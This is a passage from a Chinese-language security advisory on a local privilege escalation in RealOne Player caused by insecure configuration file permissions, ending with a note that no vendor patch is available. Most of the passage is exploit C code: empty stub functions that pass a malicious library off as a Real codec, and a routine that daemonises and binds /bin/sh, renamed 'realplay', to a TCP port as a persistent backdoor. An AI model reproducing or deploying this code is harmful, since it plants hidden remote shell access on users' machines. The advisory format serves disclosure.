|
RealOne Player不安全配置文件权限本地权限提升漏洞(4) void RAFlush(void) { }
void RAGetFlavorProperty(void) { }
void G2(void) { }
void RASetFlavor(void) { }
void RAInitDecoder(void) { }
void RACreateEncoderInstance(void) { }
/* Bind /bin/sh to PORT. It forks
* and all that good stuff, so it won't
* easily go away.
*/
int cookthis() {
int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
exit(EXIT_FAILURE);
bzero((char *) &server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
server_addr.sin_port = htons(PORT);
if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
exit(EXIT_FAILURE);
if (fork() != 0)
exit(EXIT_SUCCESS);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(EXIT_SUCCESS);
if ((sock_recv = listen(sock_des, 5)) != 0)
exit(EXIT_SUCCESS);
while (1) {
sock_len = sizeof(client_addr);
if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
exit(EXIT_SUCCESS);
client_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(sock_client,0);
dup2(sock_client,1);
dup2(sock_client,2);
execl("/bin/sh","realplay",(char *)0);
close(sock_client);
exit(EXIT_SUCCESS);
}
close(sock_client);
}
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.real.com
|
